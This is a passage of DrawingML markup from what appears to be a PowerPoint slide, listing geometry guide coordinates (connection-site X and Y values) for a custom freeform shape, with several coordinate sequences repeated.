              <a:gd name="connsiteX145" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 364290 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1728772 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 345287 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1646953 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 344412 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 328025 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 270682 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 786519 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 265483 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 784963 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 270939 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 257645 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 474761 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY197" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX198" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY198" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX199" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY199" fmla="*/ 19287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06772 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2847273 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 593254 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2766463 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 613412 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2731184 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 555080 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2538816 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 525179 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 530521 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2422066 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 533116 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 2358011 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 501423 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 2249479 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 364290 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1728772 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 345287 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1646953 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 344412 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 328025 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 270682 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 786519 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 265483 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 784963 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 270939 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY197" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX198" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY198" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX199" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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06772 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2847273 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 613412 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2731184 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 555080 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2538816 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 525179 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 530521 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2422066 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 533116 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2358011 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 501423 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 2249479 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 364290 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1728772 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 345287 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1646953 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 344412 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 328025 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 270682 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 786519 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 265483 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 784963 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 270939 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY197" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX198" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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13412 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2731184 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 555080 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2538816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70939 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 94571 w 1605470"/>
